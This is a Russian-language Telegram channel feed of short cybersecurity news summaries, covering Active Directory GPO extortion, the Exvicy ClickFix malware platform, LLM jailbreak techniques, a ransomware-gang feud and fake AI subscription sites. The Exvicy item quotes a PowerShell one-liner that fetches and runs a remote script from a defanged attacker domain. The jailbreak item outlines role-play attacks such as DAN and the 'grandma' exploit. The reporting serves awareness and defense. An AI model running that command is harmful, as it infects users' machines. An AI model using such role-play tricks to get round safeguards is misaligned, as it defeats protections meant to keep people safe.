CBUnit – главное в кибербезопасности
53 subscribers
466 photos
4.53K links
Краткое содержание новостей кибербезопасности

По вопросам: a@cbunit.ru
Download Telegram
УЦСБ защитил критичные веб-ресурсы межсетевым экраном PT Application Firewall PRO

Разбор целиком: cbunit.ru
Источники: SecurityMedia · Хабр / Новости · CNews
@cbunit
PAYLOAD: вымогательство через GPO Active Directory без шифрования

В апреле 2026 года злоумышленник получил контроль над Active Directory производственного предприятия на Ближнем Востоке. Он создал объект групповой политики (GPO) с именем PAYLOAD, который распространил требование выкупа, изменил обои и экран блокировки, а также отключил учётную запись локального администратора на всех рабочих станциях.

Атака использовала доверенную инфраструктуру Active Directory и механизмы групповой политики, что позволило обойти решения для обнаружения и реагирования на конечных устройствах (EDR). Вымогательство осуществлялось без шифрования данных, с упором на нарушение операционной деятельности и угрозу эскалации.

Что такое объект групповой политики
Объект групповой политики (GPO) — это комбинация контейнера в Active Directory и шаблона в SYSVOL. Он позволяет администраторам управлять настройками компьютеров и пользователей в домене. Привязка GPO к корню домена означает, что его настройки применяются ко всем объектам в этом домене.

Источник: Securelist
@cbunit
Exvicy копирует ErrTraffic: новая платформа для распространения ClickFix-вредоносов

Исследователи Sekoia обнаружили Exvicy — новую платформу для распространения вредоносного ПО типа ClickFix. Злоумышленник под ником @Exvicy предлагает её как услугу (MaaS), позиционируя как конкурента ErrTraffic. Изначально Exvicy продавался за $1200 в месяц, но цена выросла до $2000 из-за необходимости частых обновлений для обхода детектирования.

Анализ показал, что Exvicy использует тот же JavaScript-код, что и ErrTraffic. Мошенники создают фишинговые страницы, имитирующие проверку Cloudflare Turnstile. Для заражения жертв используется социальная инженерия с применением сочетания клавиш Win+R, которое открывает окно «Выполнить» и побуждает пользователя запустить вредоносную команду.

Что такое ClickFix
ClickFix — это тип вредоносного ПО, который использует методы социальной инженерии для обмана пользователей. Злоумышленники создают поддельные страницы верификации или установки ПО, заставляя жертв выполнять команды или загружать файлы, которые в итоге приводят к заражению системы.

powershell -wi mi -nop -Command "$a=irm 'recaptcha-check[.]com/8E9curHNH8UfAMLz';$ExecutionContext.InvokeCommand.InvokeScript($a)"


Источник: Sekoia
@cbunit
JailBreak-атаки на LLM: как обмануть ИИ ролевыми играми

Большие языковые модели (LLM) подвержены атакам типа JailBreak, которые позволяют обойти встроенные механизмы безопасности. JailBreak — это состязательная атака, цель которой — получить запрещенные или вредоносные ответы от модели. Атака инициируется пользователем, который с помощью ролевых игр или уловок заставляет модель нарушить правила безопасности.

В отличие от промпт-инъекции, где вредоносная команда приходит извне через внешние данные, JailBreak предполагает прямое взаимодействие пользователя с моделью. Пользователь напрямую «заговаривает зубы» нейросети, чтобы она выдала запрещенную информацию. Классическим примером является DAN-exploit, где модель просили играть роль персонажа без правил и ограничений, что позволяло ей отвечать на запросы, которые в обычном режиме отклонялись.

Другой пример — эксплойт «Бабушка», где модель уговаривали выдать информацию о производстве напалма, играя роль инженера-химика. Эти атаки демонстрируют, что манипуляция ограничениями модели достигается через убеждение, а не через технические уязвимости в коде.

Источник: Selectel
@cbunit
ShinyHunters захватили сайт утечек Clop и требуют выкуп

Группировка ShinyHunters захватила сайт для публикации украденных данных, принадлежащий конкурирующей группе Clop. Злоумышленники потребовали восьмизначную сумму за возврат контроля и пригрозили раскрыть информацию о предыдущих выплатах Clop.

ShinyHunters утверждает, что получила доступ к инфраструктуре Clop, эксплуатировав уязвимость в программном обеспечении сайта. Конфликт, по заявлению ShinyHunters, начался после того, как Clop использовала 0-day эксплойт для атак на клиентов Oracle E-Business Suite (EBS), хотя ShinyHunters заявляет, что обнаружила уязвимость первой.

Что такое Oracle E-Business Suite
Oracle E-Business Suite (EBS) — это комплексное интегрированное приложение для управления бизнес-процессами, включающее модули для финансов, управления персоналом, цепочками поставок и другими функциями. Уязвимости в таких системах могут привести к компрометации конфиденциальных корпоративных данных.

Источники: The Register · SecPost
@cbunit
Мошенники продают поддельные ИИ-подписки на $2000 через единый набор инструментов

Исследователи Malwarebytes Labs обнаружили более 100 мошеннических сайтов, имитирующих популярные сервисы и предлагающих подписки на ИИ-инструменты стоимостью до $2000 в год.

Сайты используют единый набор инструментов для создания и предлагают поддельные подписки на такие продукты, как GPT-6 Astra, DaVinci Resolve, PixAI и OpenCut. Они применяют профессиональный дизайн и используют легитимные формы входа Google, чтобы ввести пользователей в заблуждение. После входа в аккаунт пользователям предлагаются платные тарифы без возможности предварительного тестирования продукта.

Что такое GPT-6 Astra
GPT-6 Astra — один из сервисов, имитируемых мошенническими сайтами. Сайты предлагают подписки на ИИ-инструменты, но на самом деле являются поддельными. Они используют легитимные формы входа Google, но не предоставляют заявленные услуги.

Источник: Malwarebytes Labs
@cbunit
👍1
Windows: уязвимость Dangling COM Object позволяет повысить привилегии

Разбор целиком: cbunit.ru
Источник: Google Project Zero
@cbunit